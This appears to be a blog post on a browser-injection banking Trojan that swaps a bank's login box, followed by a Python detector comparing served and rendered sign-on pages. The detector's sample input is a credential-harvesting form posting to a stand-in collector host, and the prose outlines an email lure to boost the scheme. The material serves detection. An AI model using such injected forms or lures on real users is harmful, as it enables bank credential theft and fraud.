This is potentially one of the worst nightmares for security experts. This type of fraud has so far been observed in the context of click fraud, but the payload potential is far bigger if it is ever used to steal bank account logins and passwords.
About the scheme:
An infected user (his computer has been compromised by a virus and, say, his Firefox install is now corrupted)
tries to log on to his bank account. He types the correct domain name (say www.key.com) in the Firefox URL bar,
and the real key.com web page shows up. But when the key.com page appears in the browser, everything is legitimate except the key.com login box, which has been substituted on the fly by a script running on the hijacked computer, planted by a botnet operator who wants access to the bank account in order to make wire transfers to his own account.
Once the user enters his login and password in the box, the information is sent to the criminals. If the criminals are
smart enough, he won't notice anything: after entering his credentials, maybe he gets served a genuine key.com error page, but it's too late: the criminals have his login and password and are now wiring all his money to external bank accounts.
A potential strategy for criminals to make this scheme more effective is to have the botnet operator send millions of email messages to users known to be infected by its botnet. The botnet operator just has to send a message (one that will look very legitimate) giving the real URL for signing on to the real key.com account (or simply asking recipients to log on to their bank account without providing any link, to bypass spam traps), knowing that the recipient's browser is infected.
While I haven't seen any scheme like this so far (involving hijacking your bank account via a browser sign-on Trojan
through browser infection), I've seen the exact same scheme used in the context of click fraud, deployed by a company known as MediaForce.com, still operating as of today, substituting genuine banner ads with fake ones to promote their clients' porn and Viagra ads on legitimate websites, to users whose browsers are infected by their adware.
Question for data scientists: how would you detect such a scheme?
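As an added illustration (this is not part of the original post and not anyone's production code), here is a small Python check for the substitution described above. It parses the sign-on page as the bank's server sent it and as the infected browser renders it, then flags a login form whose action has been redirected off the bank's domain, or that has grown extra fields harvesting more than the bank asked for. www.key.com is the domain used in the post; the page path, the field names and the collector host are made up for the example, and the two HTML snippets are constructed sample input.

```python
"""Detect an on-the-fly login-form substitution by comparing the HTML the
bank served with the HTML the browser actually rendered."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample input: the sign-on page as the bank's server sent it.
# www.key.com is the domain from the post; path and field names are made up.
PAGE_URL = "https://www.key.com/signon"

SERVED_HTML = """
<html><body>
<form id="signon" method="post" action="/ibs/login">
  <input name="userid" type="text">
  <input name="password" type="password">
  <input type="submit" value="Sign on">
</form>
</body></html>
"""

# The same page as the infected browser renders it: the Trojan has pointed
# the form at its own collector (a hypothetical host) and added a field
# that harvests the ATM PIN on top of the login and password.
INJECTED_HTML = """
<html><body>
<form id="signon" method="post" action="https://collector.invalid/grab">
  <input name="userid" type="text">
  <input name="password" type="password">
  <input name="atm_pin" type="password">
  <input type="submit" value="Sign on">
</form>
</body></html>
"""


class _FormCollector(HTMLParser):
    """Collect every <form> together with the name/type of each <input> in it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = attrs.get("name") or ""
            kind = (attrs.get("type") or "text").lower()
            self._current["inputs"].append((name, kind))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def login_forms(html, page_url):
    """Return the forms that carry a password field, with the action resolved
    to an absolute URL against the page URL and the named inputs sorted."""
    parser = _FormCollector()
    parser.feed(html)
    result = []
    for form in parser.forms:
        if any(kind == "password" for _, kind in form["inputs"]):
            result.append({
                "action": urljoin(page_url, form["action"]),
                "inputs": sorted(name for name, _ in form["inputs"] if name),
            })
    return result


def detect_injection(served_html, rendered_html, page_url):
    """Compare the login forms the server sent with those the browser shows.

    Returns a list of human-readable findings; an empty list means the
    rendered page matches what was served."""
    page_host = urlsplit(page_url).netloc.lower()
    served = login_forms(served_html, page_url)
    rendered = login_forms(rendered_html, page_url)
    findings = []

    if len(rendered) != len(served):
        findings.append(
            f"login form count changed: served {len(served)}, rendered {len(rendered)}"
        )

    for form in rendered:
        target = urlsplit(form["action"])
        # The substituted box posts the credentials somewhere other than the bank.
        if target.netloc.lower() != page_host:
            findings.append(f"login form posts off-site to {form['action']}")
        # A downgrade to plain http would hand them to anyone sniffing the wire.
        elif target.scheme != "https":
            findings.append(f"login form posts over {target.scheme}: {form['action']}")

    served_fields = {name for f in served for name in f["inputs"]}
    rendered_fields = {name for f in rendered for name in f["inputs"]}
    extra = sorted(rendered_fields - served_fields)
    if extra:
        findings.append("extra fields harvested: " + ", ".join(extra))
    return findings


if __name__ == "__main__":
    for finding in detect_injection(SERVED_HTML, INJECTED_HTML, PAGE_URL):
        print("ALERT:", finding)
```

The important caveat is where the comparison runs. A Trojan that already controls the browser can tamper with, or simply suppress, any check that executes inside that same browser, so in practice the bank has to do the diff on its side: a probe served with the page reports the rendered form back to the bank, and the bank compares it with what it sent. The bank can also watch for the tell-tale absence in its own logs: a session that fetched the sign-on page and never posted credentials to it, because the real POST went to the criminals' collector instead.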